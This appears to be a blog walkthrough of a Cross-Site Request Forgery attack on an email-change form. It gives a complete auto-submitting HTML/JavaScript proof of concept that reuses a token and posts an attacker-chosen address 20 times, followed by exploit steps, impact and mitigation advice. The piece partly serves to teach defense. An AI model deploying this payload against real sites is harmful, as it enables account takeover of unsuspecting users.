How a CSRF Vulnerability Can Be Exploited to Target Email Accounts — A Practical Walkthrough

In this article, I’ll guide you through a practical example of exploiting a Cross-Site Request Forgery (CSRF) vulnerability that allows an attacker to send unauthorized requests to change a user’s email address or send verification codes to a target email address. This walkthrough will cover how the vulnerability can be exploited, the potential risks, and how to mitigate it. Let’s dive into the practical example.

The CSRF Vulnerability:

A CSRF vulnerability occurs when a web application does not properly validate whether a request is coming from a legitimate source. This allows attackers to trick authenticated users into making requests on their behalf, potentially resulting in unwanted actions such as changing an account’s email or performing other sensitive tasks.

In the example I’m demonstrating, the vulnerability exists on a page where users can change their email address. The website does not fully validate the CSRF token, allowing it to be exploited.

How the Exploit Works:

The Setup: The first thing an attacker needs is to find a way to send requests to the server using the user’s credentials. In this case, the action involves submitting a form to change the email address.HTML Form (Request Form): Here’s an example of the HTML form that is used to change the email address, with a CSRF token and an email field. The form is meant to send a POST request to the server with the email change data.<html>
<body>
<form id="csrfForm" action="https://example.com/en/settings/my-account/edit-email" method="POST" target="_blank">
<input type="hidden" name="_token" value="FAwJRrZiqhnB8reQVQQFYnQTpzQgDIBQNpzJWNEt" />
<input type="hidden" name="email" value="example@target.com" />
</form>
<script>
history.pushState('', '', '/');
let i = 0;
function sendRequest() {
if (i < 20) {
let formClone = document.getElementById('csrfForm').cloneNode(true);
formClone.target = "_blank";
document.body.appendChild(formClone);
formClone.submit();
i++;
setTimeout(sendRequest, 200);
}
}
sendRequest();
</script>
</body>
</html>

Steps to Exploit the CSRF Vulnerability:

Step 1: Cloning the FormThe attacker creates an HTML page that contains the same form as the legitimate website but with a cloned CSRF token and a target email address (in this case, “example@target.com”).The CSRF token (_token) can be reused in the cloned form, and the attacker changes the email to any address they choose.Step 2: Automating the RequestUsing JavaScript, the attacker adds a function that submits the form repeatedly. The sendRequest function creates a cloned form and submits it 20 times in quick succession.The setTimeout function ensures that each request is sent with a small delay (200 milliseconds in this case).Step 3: Triggering the AttackWhen the attacker sends the crafted HTML page to the victim and the victim opens the page while logged into the website, the form is automatically submitted.The server processes these requests as if they came from the authenticated user, potentially sending verification codes to the attacker’s target email address or making changes to the user’s account.

Impact of the Exploit:

The attacker can:

Flood the server with multiple requests, consuming resources.Hijack the email address associated with the user’s account by sending verification codes to an arbitrary email address.Perform other unauthorized actions that require the victim to be authenticated, such as changing sensitive account details.

Mitigation Steps:

Validate CSRF Tokens Properly: Ensure that CSRF tokens are unique for each request and are validated correctly on the server side. Tokens should be tied to the user session and should not be reused.Check Request Headers: Validate the Origin or Referer headers to confirm that requests are coming from a trusted domain. This can help prevent malicious sites from initiating CSRF attacks.Implement Rate Limiting: Limit the number of requests a user can make in a short period. This will help prevent attackers from flooding the server with numerous requests.Require Re-authentication for Sensitive Actions: For sensitive actions such as changing an email address or performing account updates, require the user to re-authenticate (e.g., by entering their password or using two-factor authentication).Notify Users of Sensitive Actions: Whenever a critical action like changing an email address occurs, notify the user through an additional channel (e.g., via email or SMS) so they can immediately take action if they didn’t authorize the change.